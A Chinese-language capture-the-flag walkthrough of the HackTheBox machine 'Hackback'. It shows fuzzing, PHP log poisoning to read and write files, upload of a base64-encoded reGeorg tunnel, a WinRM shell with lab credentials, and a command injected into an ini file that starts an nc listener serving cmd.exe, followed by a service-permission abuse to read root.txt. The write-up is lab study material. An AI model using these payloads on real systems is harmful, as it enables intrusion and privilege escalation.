Hackback是一个非常难的靶机,其中涉及了钓鱼网站、参数模糊测试、日志中毒、HTTP代理、WinRm服务、UserLogger服务、NFTS数据流、恶意dll等知识,总共耗费了我五天时间来攻克和研究,感兴趣的同学可以在HackTheBox中进行学习。我觉得主要难的还是日志相关的那两个点,这是不是和近期log4j2远程代码执行有异曲同工之妙呢?让我们一起来看看
0x01 侦查
端口探测
首先通过nmap对目标进行端口扫描
代码语言:javascript复制nmap -Pn -p- -sV -sC -A 10.10.10.128 -oA nmap_Hackback
发现目标开放了80、6666、64381端口
80端口
网站元素查看可以发现该站点采用 ASP.NET
6666端口
代码语言:javascript复制curl http://10.10.10.128:6666
提示说缺少命令,尝试通过 wfuzz 来对正确的路径进行模糊测试
代码语言:javascript复制wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt --hc 404 http://10.10.10.128:6666/FUZZ
发现了一些路径,首先探测 help
代码语言:javascript复制curl http://10.10.10.128:6666/help
在 help 中列出了全部参数,那么接下来测试这些路径
代码语言:javascript复制curl http://10.10.10.128:6666/hello
curl http://10.10.10.128:6666/proc | jq -c .[]
curl http://10.10.10.128:6666/whoami
curl http://10.10.10.128:6666/list | jq -c .[]
curl http://10.10.10.128:6666/services | jq -c .[]
curl -s http://10.10.10.128:6666/netstat | jq -r '.[] | select(.State=2) | "(.LocalAddress):(.LocalPort) [(.OwningProcess)]"' | sed 's/::/0.0.0.0/g' | sort -n -t':' -k2
经过整理可以看到 hello 返回一条打招呼信息;proc 返回进程列表;whoami 返回当前用户具体信息;list 返回网站目录当中的内容;services 返回服务信息;netstat 返回端口连接情况,相比nmap探测的要多。
64831端口
是一个GoPhish登录界面
通过默认账号密码 admin/gophish 进入
在电子邮件模块下存在五个模块,分别是 Admin、Fackbook、HackTheBox、Paypal、Twitter
点击 Admin 模块,切换到 html 格式,可以发现存在一个域名
点开其他的模块也可以发现不同的域名,经过整理后如下
代码语言:javascript复制admin.hackback.htb
www.facebook.htb
www.hackthebox.htb
www.paypal.htb
www.twitter.htb
将它们添加到hosts文件中配置DNS
代码语言:javascript复制vim /etc/hosts
##配置
10.10.10.128 admin.hackback.htb www.hackthebox.htb www.twitter.htb www.paypal.htb www.facebook.htb
钓鱼网站
设置完成后分别访问四个域
发现这些站点都是著名网站的登录界面,它们主要用于骗取受害人的登录信息,具体手法是通过发送包含钓鱼网站的电子邮件,受害者打开邮件访问这些站点输入账号密码后,就会被黑客获取到账号信息。查看数据包发现这些站点基于PHP和ASP.NET
管理员登录界面
admin.hackback.htb 是一个不同于钓鱼网站的登录界面,查看页面源代码
其中存在一个提示<script src="js/.js"></script>,但是访问 js 目录显示403,通过 gobuster 扫描 js 目录
gobuster dir -u http://admin.hackback.htb/js/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x js -t 50
查看private.js发现如下内容
一般在js中使用 var 来定义字符串,而这个js择使用 ine 来定义字符串,猜测可能是经过rot13编码后的js代码
代码语言:javascript复制curl http://admin.hackback.htb/js/private.js | tr 'a-zA-Z' 'n-za-mN-ZA-M'
放入beautifier.io中进行美化,获得如下 js 代码
var a = ['x57x78x49x6ax77x72x37x44x75x73x4fx38x47x73x4bx76x52x77x42x2bx77x71x33x44x75x4dx4bx72x77x72x4cx44x67x63x4fx69x77x72x59x31x4bx45x45x67x47x38x4bx43x77x71x37x44x6cx38x4bx33', 'x41x63x4fx4dx77x71x76x44x71x51x67x43x77x34x2fx43x74x32x6ex44x74x4dx4bx68x5ax63x4bx44x77x71x54x43x70x54x73x79x77x37x6ex43x68x73x4fx51x58x4dx4fx35x57x38x4bx70x44x73x4fx74x4ex43x44x44x76x41x6ax43x67x79x6bx3d', 'x77x35x48x44x72x38x4fx37x64x44x52x6dx4dx4dx4bx4ax77x34x6ax44x6cx56x52x6ex77x72x74x37x77x37x73x30x77x6fx31x61x77x37x73x41x51x73x4bx73x66x73x4fx45x77x34x58x44x73x52x6ax43x6cx4dx4fx77x46x7ax72x43x6dx7ax70x76x43x41x6ax43x75x42x7ax44x73x73x4bx39x46x38x4fx34x77x71x5ax6ex57x73x4bx68'];
(function(c, d) {
var e = function(f) {
while (--f) {
c['push'](c['shift']());
}
};
e( d);
}(a, 0x66));
var b = function(c, d) {
c = c - 0x0;
var e = a[c];
if (b['MsULmv'] === undefined) {
(function() {
var f;
try {
var g = Function('returnx20(function()x20' '{}.constructor(x22returnx20thisx22)(x20)' ');');
f = g();
} catch (h) {
f = window;
}
var i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';
f['atob'] || (f['atob'] = function(j) {
var k = String(j)['replace'](/= $/, '');
for (var l = 0x0, m, n, o = 0x0, p = ''; n = k['charAt'](o ); ~n && (m = l % 0x4 ? m * 0x40 n : n, l % 0x4) ? p = String['fromCharCode'](0xff & m >> (-0x2 * l & 0x6)) : 0x0) {
n = i['indexOf'](n);
}
return p;
});
}());
var q = function(r, d) {
var t = [],
u = 0x0,
v, w = '',
x = '';
r = atob(r);
for (var y = 0x0, z = r['length']; y < z; y ) {
x = '%' ('00' r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);
}
r = decodeURIComponent(x);
for (var A = 0x0; A < 0x100; A ) {
t[A] = A;
}
for (A = 0x0; A < 0x100; A ) {
u = (u t[A] d['charCodeAt'](A % d['length'])) % 0x100;
v = t[A];
t[A] = t[u];
t[u] = v;
}
A = 0x0;
u = 0x0;
for (var B = 0x0; B < r['length']; B ) {
A = (A 0x1) % 0x100;
u = (u t[A]) % 0x100;
v = t[A];
t[A] = t[u];
t[u] = v;
w = String['fromCharCode'](r['charCodeAt'](B) ^ t[(t[A] t[u]) % 0x100]);
}
return w;
};
b['OoACcd'] = q;
b['qSLwGk'] = {};
b['MsULmv'] = !![];
}
var C = b['qSLwGk'][c];
if (C === undefined) {
if (b['pIjlQB'] === undefined) {
b['pIjlQB'] = !![];
}
e = b['OoACcd'](e, d);
b['qSLwGk'][c] = e;
} else {
e = C;
}
return e;
};
var x = 'x53x65x63x75x72x65x20x4cx6fx67x69x6ex20x42x79x70x61x73x73';
var z = b('0x0', 'x50x5dx53x36');
var h = b('0x1', 'x72x37x54x59');
var y = b('0x2', 'x44x41x71x67');
var t = 'x3fx61x63x74x69x6fx6ex3dx28x73x68x6fx77x2cx6cx69x73x74x2cx65x78x65x63x2cx69x6ex69x74x29';
var s = 'x26x73x69x74x65x3dx28x74x77x69x74x74x65x72x2cx70x61x79x70x61x6cx2cx66x61x63x65x62x6fx6fx6bx2cx68x61x63x6bx74x68x65x62x6fx78x29';
var i = 'x26x70x61x73x73x77x6fx72x64x3dx2ax2ax2ax2ax2ax2ax2ax2a';
var k = 'x26x73x65x73x73x69x6fx6ex3d';
var w = 'x4ex6fx74x68x69x6ex67x20x6dx6fx72x65x20x74x6fx20x73x61x79';
这段代码将a设置为三个二进制 blob 的数组,使用 0x66 运行一个函数,定义函数 b 用于解码。将其放入本地 js 运行,也可在tio.run站点运行
js
> var ...
根据提示访问2bb6916122f1da34dcd916421e531578目录,直接访问会重定向回主目录。在该目录下访问其他路径会提示404,说明可能存在其他文件,在其中进行目录扫描
gobuster dir -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/ -w /usr/share/wordlists/dirb/big.txt -xphp -t 50
发现webadmin.php,之后开始对参数进行构造,发现 acton=list 下会有回显密码错误
代码语言:javascript复制curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=test&session='
使用 wfuzz 对密码进行模糊测试
代码语言:javascript复制wfuzz -c -w /usr/share/wordlists/SecLists/Passwords/darkweb2017-top1000.txt --hw 0 --hh 17 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session='
发现密码为12345678,使用该密码查看返回信息
代码语言:javascript复制curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=12345678&session='
成功返回日志,但是这是哪个站点的日志呢?经过测试后发现登录 hackthebox后会出现一个新的日志,其中sessionid就是我的内网地址
将日志名设置为该seesionid同时修改action为show后可以获取日志内容
代码语言:javascript复制curl -b "PHPSESSIONID=3c4b5b07fe829951a788d023036262fb6f49340d22959897bd937d096bc8183d" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=3c4b5b07fe829951a788d023036262fb6f49340d22959897bd937d096bc8183d'
0x02 上线[simple]
php日志中毒
虽然无法知道知道它的真实路径,但是可以将php代码写入日志文件后查看。使用 BurpSuite 抓取 admin.hackthebox.htb 的登录数据包并修改用户名为php代码,将其作为代码执行点
查询日志记录
代码语言:javascript复制curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7'
发现php代码成功执行,那么我们开始执行 whoami
返回一个逗号说明 whoami 命令没起作用
php可以列出和读取文件都是在 list 和 show 操作中完成的,在创建这些日志文件时也在写入文件。那么可以在执行点中通过函数 scandir 和 print_r 列出目录并打印结果
代码语言:javascript复制<?php echo print_r(scandir($_GET['dir']));?>
在执行点中通过参数 show 传递 dir 命令
代码语言:javascript复制curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.'
成功返回当前目录文件名,在执行点中写入<?php include($_GET['file']);?>尝试进行文件读取
curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.&file=index.html'
成功返回index.html内容。为了防止乱码,在执行点中尝试通过php过滤器经过 base64 编码来读取php文件
代码语言:javascript复制curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.&file=php://filter/convert.base64-encode/resource=webadmin.php'
成功返回,将内容进行 base64 解码即可
代码语言:javascript复制cat webadmin.php.bs64 | base64 -d
既然可以读取文件,那么可以尝试写入文件,通过 file_out_contents 在目标上写入文件,先尝试获取一个base64编码
代码语言:javascript复制echo "mac is good" | base64 -w0
在执行点中将内容写入日志中完成命令执行
代码语言:javascript复制<?php $f="bWFjIGlzIGdvb2QK";file_put_contents("mac.txt",base64_decode($f));?>
查看当前目录,发现 mac.txt 已经写入,需要注意的是以下命令得执行两次才能看到写入的文件
代码语言:javascript复制curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=.'
访问文件地址查看 mac.txt 文件内容
代码语言:javascript复制curl http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/mac.txt
到目前为止,我们知道该执行点可以列出文件、查看文件以及写入文件。接下来在执行点中写入代码查看上层目录
代码语言:javascript复制<?php print_r(scandir('..'));?>
查看上层文件路径
代码语言:javascript复制curl -b "PHPSESSIONID=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7" 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=8870c91857abf06f5f0fe0d9acea7f53d846be75c18ab95a0018a32a6b5518f7&dir=..'
发现 web.config 以及 web.config.old,那么继续在执行点中写入PHP代码查看它们的内容
代码语言:javascript复制<?php echo file_get_contents('../web.config');?>
<?php echo file_get_contents('../web.config.old');?>
在 web.config.old 中发现存在 windows 用户账号密码
借助代理完成WinRM上线
在之前的信息收集我们知道6666端口监听的是 winRM 服务,该站点上可以运行 ASP.NET 以及 php,但是在 php 中存在被阻止函数,所以我们尝试使用 ASP.NET 类型的代理,那么开始上传 regeorg 代理
工具地址:https://github.com/sensepost/reGeorg
首先将tunnel.aspx转换为base64编码
代码语言:javascript复制cat tunnel.aspx | base64 -w0
上传该base64编码并通过base64_decode()解码
代码语言:javascript复制/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* <?php $f="77u/PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBFbmFibGVTZXNzaW9uU3RhdGU9IlRydWUiJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uTmV0IiAlPg0KPCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5OZXQuU29ja2V0cyIgJT4NCjwlDQovKiAgICAgICAgICAgICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICBfX19fXyAgIF9fX19fXyAgX198X19fICB8X18gIF9fX19fXyAgX19fX18gIF9fX19fICAgX19fX19fICANCiB8ICAgICB8IHwgICBfX198fCAgIF9fX3wgICAgfHwgICBfX198LyAgICAgXHwgICAgIHwgfCAgIF9fX3wgDQogfCAgICAgXCB8ICAgX19ffHwgICB8ICB8ICAgIHx8ICAgX19ffHwgICAgIHx8ICAgICBcIHwgICB8ICB8IA0KIHxfX3xcX19cfF9fX19fX3x8X19fX19ffCAgX198fF9fX19fX3xcX19fX18vfF9ffFxfX1x8X19fX19ffCANCiAgICAgICAgICAgICAgICAgICAgfF9fX19ffA0KICAgICAgICAgICAgICAgICAgICAuLi4gZXZlcnkgb2ZmaWNlIG5lZWRzIGEgdG9vbCBsaWtlIEdlb3JnDQogICAgICAgICAgICAgICAgICAgIA0KICB3aWxsZW1Ac2Vuc2Vwb3N0LmNvbSAvIEBfd19tX18NCiAgc2FtQHNlbnNlcG9zdC5jb20gLyBAdHJvd2FsdHMNCiAgZXRpZW5uZUBzZW5zZXBvc3QuY29tIC8gQGthbXBfc3RhYWxkcmFhZA0KDQpMZWdhbCBEaXNjbGFpbWVyDQpVc2FnZSBvZiByZUdlb3JnIGZvciBhdHRhY2tpbmcgbmV0d29ya3Mgd2l0aG91dCBjb25zZW50DQpjYW4gYmUgY29uc2lkZXJlZCBhcyBpbGxlZ2FsIGFjdGl2aXR5LiBUaGUgYXV0aG9ycyBvZg0KcmVHZW9yZyBhc3N1bWUgbm8gbGlhYmlsaXR5IG9yIHJlc3BvbnNpYmlsaXR5IGZvciBhbnkNCm1pc3VzZSBvciBkYW1hZ2UgY2F1c2VkIGJ5IHRoaXMgcHJvZ3JhbS4NCg0KSWYgeW91IGZpbmQgcmVHZW9yZ2Ugb24gb25lIG9mIHlvdXIgc2VydmVycyB5b3Ugc2hvdWxkDQpjb25zaWRlciB0aGUgc2VydmVyIGNvbXByb21pc2VkIGFuZCBsaWtlbHkgZnVydGhlciBjb21wcm9taXNlDQp0byBleGlzdCB3aXRoaW4geW91ciBpbnRlcm5hbCBuZXR3b3JrLg0KDQpGb3IgbW9yZSBpbmZvcm1hdGlvbiwgc2VlOg0KaHR0cHM6Ly9naXRodWIuY29tL3NlbnNlcG9zdC9yZUdlb3JnDQoqLw0KICAgIHRyeQ0KICAgIHsNCiAgICAgICAgaWYgKFJlcXVlc3QuSHR0cE1ldGhvZCA9PSAiUE9TVCIpDQogICAgICAgIHsNCiAgICAgICAgICAgIC8vU3RyaW5nIGNtZCA9IFJlcXVlc3QuSGVhZGVycy5HZXQoIlgtQ01EIik7DQogICAgICAgICAgICBTdHJpbmcgY21kID0gUmVxdWVzdC5RdWVyeVN0cmluZy5HZXQoImNtZCIpLlRvVXBwZXIoKTsNCiAgICAgICAgICAgIGlmIChjbWQgPT0gIkNPTk5FQ1QiKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIHRyeQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgU3RyaW5nIHRhcmdldCA9IFJlcXVlc3QuUXVlcnlTdHJpbmcuR2V0KCJ0YXJnZXQiKS5Ub1VwcGVyKCk7DQogICAgICAgICAgICAgICAgICAgIC8vUmVxdWVzdC5IZWFkZXJzLkdldCgiWC1UQVJHRVQiKTsNCiAgICAgICAgICAgICAgICAgICAgaW50IHBvcnQgPSBpbnQuUGFyc2UoUmVxdWVzdC5RdWVyeVN0cmluZy5HZXQoInBvcnQiKSk7DQogICAgICAgICAgICAgICAgICAgIC8vUmVxdWVzdC5IZWFkZXJzLkdldCgiWC1QT1JUIikpOw0KICAgICAgICAgICAgICAgICAgICBJUEFkZHJlc3MgaXAgPSBJUEFkZHJlc3MuUGFyc2UodGFyZ2V0KTsNCiAgICAgICAgICAgICAgICAgICAgU3lzdGVtLk5ldC5JUEVuZFBvaW50IHJlbW90ZUVQID0gbmV3IElQRW5kUG9pbnQoaXAsIHBvcnQpOw0KICAgICAgICAgICAgICAgICAgICBTb2NrZXQgc2VuZGVyID0gbmV3IFNvY2tldChBZGRyZXNzRmFtaWx5LkludGVyTmV0d29yaywgU29ja2V0VHlwZS5TdHJlYW0sIFByb3RvY29sVHlwZS5UY3ApOw0KICAgICAgICAgICAgICAgICAgICBzZW5kZXIuQ29ubmVjdChyZW1vdGVFUCk7DQogICAgICAgICAgICAgICAgICAgIHNlbmRlci5CbG9ja2luZyA9IGZhbHNlOw0KICAgICAgICAgICAgICAgICAgICBTZXNzaW9uLkFkZCgic29ja2V0Iiwgc2VuZGVyKTsNCiAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQWRkSGVhZGVyKCJYLVNUQVRVUyIsICJPSyIpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBjYXRjaCAoRXhjZXB0aW9uIGV4KQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQWRkSGVhZGVyKCJYLUVSUk9SIiwgZXguTWVzc2FnZSk7DQogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiRkFJTCIpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGVsc2UgaWYgKGNtZCA9PSAiRElTQ09OTkVDVCIpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgdHJ5IHsNCiAgICAgICAgICAgICAgICAgICAgU29ja2V0IHMgPSAoU29ja2V0KVNlc3Npb25bInNvY2tldCJdOw0KICAgICAgICAgICAgICAgICAgICBzLkNsb3NlKCk7DQogICAgICAgICAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGV4KXsNCg0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBTZXNzaW9uLkFiYW5kb24oKTsNCiAgICAgICAgICAgICAgICBSZXNwb25zZS5BZGRIZWFkZXIoIlgtU1RBVFVTIiwgIk9LIik7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlIGlmIChjbWQgPT0gIkZPUldBUkQiKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIFNvY2tldCBzID0gKFNvY2tldClTZXNzaW9uWyJzb2NrZXQiXTsNCiAgICAgICAgICAgICAgICB0cnkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIGludCBidWZmTGVuID0gUmVxdWVzdC5Db250ZW50TGVuZ3RoOw0KICAgICAgICAgICAgICAgICAgICBieXRlW10gYnVmZiA9IG5ldyBieXRlW2J1ZmZMZW5dOw0KICAgICAgICAgICAgICAgICAgICBpbnQgYyA9IDA7DQogICAgICAgICAgICAgICAgICAgIHdoaWxlICgoYyA9IFJlcXVlc3QuSW5wdXRTdHJlYW0uUmVhZChidWZmLCAwLCBidWZmLkxlbmd0aCkpID4gMCkNCiAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgcy5TZW5kKGJ1ZmYpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiT0siKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgY2F0Y2ggKEV4Y2VwdGlvbiBleCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1FUlJPUiIsIGV4Lk1lc3NhZ2UpOw0KICAgICAgICAgICAgICAgICAgICBSZXNwb25zZS5BZGRIZWFkZXIoIlgtU1RBVFVTIiwgIkZBSUwiKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlIGlmIChjbWQgPT0gIlJFQUQiKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIFNvY2tldCBzID0gKFNvY2tldClTZXNzaW9uWyJzb2NrZXQiXTsNCiAgICAgICAgICAgICAgICB0cnkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIGludCBjID0gMDsNCiAgICAgICAgICAgICAgICAgICAgYnl0ZVtdIHJlYWRCdWZmID0gbmV3IGJ5dGVbNTEyXTsNCiAgICAgICAgICAgICAgICAgICAgdHJ5DQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgIHdoaWxlICgoYyA9IHMuUmVjZWl2ZShyZWFkQnVmZikpID4gMCkNCiAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBieXRlW10gbmV3QnVmZiA9IG5ldyBieXRlW2NdOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vQXJyYXkuQ29uc3RyYWluZWRDb3B5KHJlYWRCdWZmLCAwLCBuZXdCdWZmLCAwLCBjKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBTeXN0ZW0uQnVmZmVyLkJsb2NrQ29weShyZWFkQnVmZiwgMCwgbmV3QnVmZiwgMCwgYyk7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQmluYXJ5V3JpdGUobmV3QnVmZik7DQogICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICBSZXNwb25zZS5BZGRIZWFkZXIoIlgtU1RBVFVTIiwgIk9LIik7DQogICAgICAgICAgICAgICAgICAgIH0gICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICBjYXRjaCAoU29ja2V0RXhjZXB0aW9uIHNvZXgpDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiT0siKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICBjYXRjaCAoRXhjZXB0aW9uIGV4KQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgUmVzcG9uc2UuQWRkSGVhZGVyKCJYLUVSUk9SIiwgZXguTWVzc2FnZSk7DQogICAgICAgICAgICAgICAgICAgIFJlc3BvbnNlLkFkZEhlYWRlcigiWC1TVEFUVVMiLCAiRkFJTCIpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0gDQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICBSZXNwb25zZS5Xcml0ZSgiR2Vvcmcgc2F5cywgJ0FsbCBzZWVtcyBmaW5lJyIpOw0KICAgICAgICB9DQogICAgfQ0KICAgIGNhdGNoIChFeGNlcHRpb24gZXhLYWspDQogICAgew0KICAgICAgICBSZXNwb25zZS5BZGRIZWFkZXIoIlgtRVJST1IiLCBleEthay5NZXNzYWdlKTsNCiAgICAgICAgUmVzcG9uc2UuQWRkSGVhZGVyKCJYLVNUQVRVUyIsICJGQUlMIik7DQogICAgfQ0KJT4NCg==";file_put_contents("tunnel.aspx",base64_decode($f));?>
*/
执行后访问日志,再查看文件可以发现隧道已经建立,说明成功上传代理脚本
代码语言:javascript复制curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=12345678&session='
curl http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx
接下来设置 proxychains 本地代理
代码语言:javascript复制vim /etc/proxychains4.conf
## 配置
127.0.0.1 8888
使用 reGeorgSocksProxy 开启代理,建立 http 隧道
代码语言:javascript复制python reGeorgSocksProxy.py -p 8888 -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx
通过 WinRm 脚本连接,对 Alamot 的Ruby脚本增添上传功能。代码如下
原脚本地址:https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb
代码语言:javascript复制require 'winrm-fs'
# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:tempmyfile.txt
conn = WinRM::Connection.new(
endpoint: 'http://127.0.0.1:5985/wsman',
user: 'simple',
password: 'ZonoProprioZomaro:-(',
:no_ssl_peer_verification => true
)
file_manager = WinRM::FS::FileManager.new(conn)
class String
def tokenize
self.
split(/s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ )|( $)|(^["'] )|(["'] $)/,'')}
end
end
command=""
conn.shell(:powershell) do |shell|
until command == "exitn" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi -force $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " upload_command[1] " to " upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end
通过代理执行winrm_shell.rb
代码语言:javascript复制proxychains ruby winrm_shell.rb
成功上线 simple 用户
0x03 权限提升[hacker]
查看本地环境
powershell环境查看当前语言环境为完整的语言模式
代码语言:javascript复制$executioncontext.sessionstate.languagemode
AppLocker绕过上传 nc.exe 到windowssystem32spooldriverscolor目录下,用于绕过 AppLocker
UPLOAD /root/hackthebox/Machines/Hackback/nc.exe C:Windowssystem32spooldriverscolornc.exe
在本地开启nc监听443端口,但是无法回连
代码语言:javascript复制Windowssystem32spooldriverscolornc.exe 10.10.14.14 443
防火墙限制查看防火墙是否对出口流量作出了限制
代码语言:javascript复制cmd /c "netsh advfirewall show currentprofile"
防火墙默认设置是阻止进出,查看对应的规则
代码语言:javascript复制cmd /c "netsh advfirewall firewall show rule name=all"
显示存在两个规则:ping、web,其中 web 端口包括80、6666和64831,因此我们只能通过这几个端口出口流量
查看目录文件
查看根目录,重点关注util目录
dir c:
查看该目录下的所有文件
代码语言:javascript复制dir c:util -force
重点关注隐藏文件夹scripts
dir c:utilscripts
发现 log.txt 和 batch.log 今天还在更新,而 dellog.ps1 是一个脚本。我们只能查看log.txt,而 batch.log 和 dellog.ps1 没有权限查看
命令注入完成nc上线
检查文件 clean.ini,猜测是 dellog.ps1 的参数文件
dellog.ps1 执行时会把 clean.ini 中的内容作为参数执行,因此这里存在命令注入漏洞。我们可以编辑 clean.ini,向其中写入命令
代码语言:javascript复制echo [Main] > C:utilscriptsclean.ini
echo Lifetime=100 >> C:utilscriptsclean.ini
echo "LogFile=c:utilscriptslog.txt & cmd.exe /c c:\Windowssystem32spooldriverscolornc.exe -lvp 2222 -e cmd.exe" >> C:utilscriptsclean.ini
echo "Directory=c:inetpublogslogfiles" >> C:utilscriptsclean.ini
成功写入命令,过五分钟左右监听器会启动,通过代理 nc 可连接目标
代码语言:javascript复制proxychains nc 10.10.10.128 2222
成功获取shell
读取user.txt
代码语言:javascript复制dir c:UsershackerDesktop
type c:UsershackerDesktopuser.txt
成功拿到第一个flag
0x04 权限提升[system]
分析UserLogger服务
通过枚举,可以发现存在一个不认识的服务UserLogger,在注册表查看该服务
reg query HKEY_LOCAL_MACHINESystemCurrentControlSetServicesuserlogger
启动服务UserLogger,指定目录为c:mac
sc start userlogger c:mac
查看根目录发现 mac.log 已经生成,查看该日志文件
查看文件权限,为 everyone
代码语言:javascript复制cacls C:mac.log
经过分析这个服务可以将输入路径的最后一个文件名拼接上.log,同时修改文件的权限。由于windows的文件名不接受:,可以在文件名最后加上:进行截断,也就是当它读取.log的所有内容时,:将被删除,新权限将被应用到文件名上。
NTFS数据流读取root.txt
那么可以尝试读取root.txt。首先进入administrator目录
代码语言:javascript复制sc start userlogger "c:usersadministrator:"
icacls c:usersadministrator
cd c:usersadministrator
成功进入,接下来读取root.txt
代码语言:javascript复制sc stop userlogger
sc start userlogger "c:usersadministratordesktoproot.txt:"
如果在 cmd 下直接读取是读取不到的,需要转换到 powershell 命令窗口才可以看到
